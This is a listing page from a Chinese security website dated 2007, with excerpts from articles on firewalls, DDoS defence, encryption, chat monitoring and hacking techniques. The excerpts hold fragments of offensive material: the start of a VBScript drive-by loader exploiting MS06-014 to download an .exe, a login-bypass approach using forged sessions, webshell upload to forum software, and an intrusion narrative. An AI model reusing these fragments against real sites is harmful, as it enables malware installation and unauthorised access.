入侵实例看虚拟主机系统的安全问题(下)		点击:0
由一次入侵实例看虚拟主机系统的安全问题(下) 作者: 更新日期:2004-10-31 类别:网络安全->安全防御 总浏览/今日:332/1 虽然到目前为止，我事实上已经控制了他所有的UNIX主机，也早就有了root权限，但root的密码我还是不知道，这多少还有点不甘心，怎样来得到这个密码呢(2007-11-19)

	黑客们正醉心于研究的：拒绝服务攻击		点击:0
Internet给全世界的人们带来了无限的生机，真正实现了无国界的全球村。但是还有很多困绕我们的因素，象IP地址的短缺，大量带宽的损耗，以及政府规章的限制和编程技术的不足。现在，由于多年来网络系统累积下了无数的漏洞，我们将面临着更大的威胁，网络中潜伏的好事者(2007-11-19)

	如何查看系统记录以及追踪系统入侵者		点击:0
前言 通信过程的纪录设定 记录到哪边去? 地理位置的追踪 Domain Name命名的三种情况 在局域网络上可能你听过所谓“广播模式”的资料发送方法，此种方法不指定收信站，只要和此网络连结的所有网络设备皆为收信对象。但是这仅仅在局域网络上能够实行,因为局域网络上的机(2007-11-19)

	网络防火墙与防范溢出策略（解决方案）		点击:0
“溢出”一直以来都是很多黑帽子黑客最常用(或者说是最喜欢用)的手段之一，随安全文化的逐步普及，大量的公开shellcode(“溢出”代码)与溢出攻击原理都可以随意在各大的网络安全网站中找得到，由此衍生了一系列的安全隐患...小黑黑使用它们来进行非法的攻击、恶意程序(2007-11-19)

	经典：网络经验谈之网络故障70例		点击:0
网络故障70例！！！ 1.故障现象：网络适配器（网卡）设置与计算机资源有冲突。 分析、排除：通过调整网卡资源中的IRQ和I/O值来避开与计算机其它资源的冲突。有些情况还需要通过设置主板的跳线来调整与其它资源的冲突。 2.故障现象：网吧局域网中其他客户机在“网上邻居(2007-11-19)

	黑客技巧谈之伪造Session登陆后台		点击:0
发现里面有个站程序还不错..可密码一直找不到.. 看登陆验证代码的时候就想是否可以修改代码..绕过验证访问后台呢..记的以前nowthk教过我..可怜我这个记性啊..给忘了..又请教了下nowthk... login.asp的验证代码 user_name=trim(request.form("uid")) user_password=trim(2007-11-19)

	不只MSN会被监听，QQ也一样的		点击:0
这两天有媒体报道有关MSN会任意监听的新闻。我感觉这已经不能算真正的新闻了，MSN会被监听也不是近段时间才出现的事，MSN包括QQ都可以被监到都是很久的事了。 一年多前，通过某种软件，就可以监听局域网内的MSN传输信息了，网上有这样的软件出售，而且是名为安全软件的(2007-11-19)

	卡巴斯基突举封杀大旗，意欲何为！		点击:0
一直让我们喜爱的卡巴突然举起了封杀的大旗.几乎与此同时,另一个免费得到正版key的消息传到了各大论坛.自然大家都知道了奇虎360安装送半年激活码的消息.这样的事件会是巧合嘛?本人不禁浮想联翩,卡巴与奇虎此举实是双赢呀!卡巴在中国市场一直没能进入企业和政府这些大有(2007-11-19)

	浅谈高手是如何针对DDos部署防御措施的		点击:0
DDoS（Distributed Denial of Service，分布式拒绝服务）攻击的主要手段是通过大于管道处理能力的流量淹没管道或通过超过处理能力的任务使系统瘫痪，所以理论上只要攻击者能够获得比目标更强大的“动力”，目标是注定会被攻陷的。 对于DDoS攻击来说并没有100％有效的防(2007-11-19)

	针对ASP类网站的Win 2003硬盘安全设置		点击:0
C:分区部分： c: administrators 全部 iis_wpg 只有该文件夹 列出文件夹/读数据 读属性 读扩展属性 读取权限 c:inetpubmailroot administrators 全部 system 全部 service 全部 c:inetpubftproot everyone 只读和运行 c:windows administrators 全部 Creator owner 不(2007-11-19)

	手把手教您如何巧妙分离带木马的文件！		点击:0
第一步:用UltraEdit的十六进制方式打开绑定程序，选中第二个MZ到第三个MZ之间的内容(即第二个文件)，将该部分复制。然后新建一个文件，粘贴，保存为EXE文件。（点击查看更多软件使用技巧） 第二步:选中第三个MZ至文件末尾之间的内容(即第三个文件)，同样复制，新建文件(2007-11-19)

	BBSxp/LeadBBS后台上传Webshell的防范		点击:0
关于BBSxp/LeadBBS的后台上传Webshell的防范 作者:kEvin1986 更新日期:2005-04-01 类别:网络安全->安全防御 总浏览/今日:650/1 最近弄了两个BBS系统,发现后台传/改Webshell的时候都做了一定限度的防范,使得很多新手不知道如何去传Webshell控制主机.其实这个问题很简单.(2007-11-19)

	浅析传统防火墙存在的五大不足之处		点击:0
如今，知识渊博的黑客，均能利用网络防火墙开放的端口，巧妙躲过网络防火墙的监测，直接针对目标应用程序。他们想出复杂的攻击方法，能够绕过传统网络防火墙。据专家统计，目前70%的攻击是发生在应用层，而不是网络层。对于这类攻击，传统网络防火墙的防护效果，并不太(2007-11-19)

	菜鸟变黑客高手（超级经典完美整理版）		点击:0
第一章------关于找软件 常用类软件： 黑白屋： http://www.play8.net/ 华军软件 http://www.newhua.com/ （根据物理位置自行选择速度快的镜像） 中国下载 http://download.com.cn/ （使用查找功能可找到大部份软件） 东丽在线 http://www.tjdl.net/softdown/ （不错的(2007-11-19)

	有关MS06014网马的一种变形方法		点击:0
MS06014网马的一种变形方法 请看原始代码 script language=VBScript on error resume next dl = http://www.baidu.com/heng.exe Set df = document.createElement(object) df.setAttribute classid, clsid:BD96C556-65A3-11D0-983A-00C04FC29E36 str=Microsoft.XMLHTTP(2007-11-19)

	Microsoft信息系统安全管理解决方案		点击:0
“信息安全”是具有广泛内涵的概念，涉及指导思想、规程、各层面的技术保障、人员管理等诸多方面，是一个“立体”而“多维度”的概念，因此仅单纯依赖技术实现是不全面，也是不可取的。在当今高度信息化、互联化的背景下，政府部门信息化应用面临着各种安全陷阱和威胁(2007-11-19)

	微软揭露更多WindowsSever2003SP2计划		点击:0
微软说Windows Server 2003 Service Pack 2不会像SP1那样给Server 2003带来巨大变化，它主要由所有安全更新和hotfixe组成。当然，SP2也会增加对Windows Vista的支持。 另外ia，Remote Installation Services被重新设计更新为Windows Deployment Services，Microsoft Ma(2007-11-19)

	在线聊天监控现象严重 隐私安全待解决		点击:0
目前，社会发展步入互联网时代，互联网在线沟通聊天变得日渐频繁，甚至成为工作学习的重要部分。如何学习安全技巧、学会保护自己的隐私，成为时下互联网人的必修课。网络聊天隐私问题成为大众关注的焦点。 前不久业界爆出MSN聊天被监控事实。上海某白领放弃月薪三万的(2007-11-19)

	网络中最基本的安全技术：数据加密技术		点击:0
数据加密是实现网络安全的关键技术之一，本文首先介绍加密的基本概念，然后着重讨论两类最常见的加密技术：私用密钥加密和公开密钥加密，并详细探讨了它们的特点、发展及今后的研究方向。 加密算法 由于Internet的快速发展，网络安全问题日益受到人们的重视。面临计算(2007-11-19)

	网站安全体系 应用学习手册（白皮书）		点击:0
网站安全体系 1 网络应用的信息安全 1 1.1 网络信息的安全需求 1 1.2 网络信息安全需求的层次 2 1.3 网络信息的安全威胁 3 1.4 网络信息的安全威胁评估与安全技术 3 1.5 网络应用系统的安全管理 5 2 网站的信息安全体系 5 2.1 安全策略 5 2.2 安全需求的保证 6 2.2.1(2007-11-19)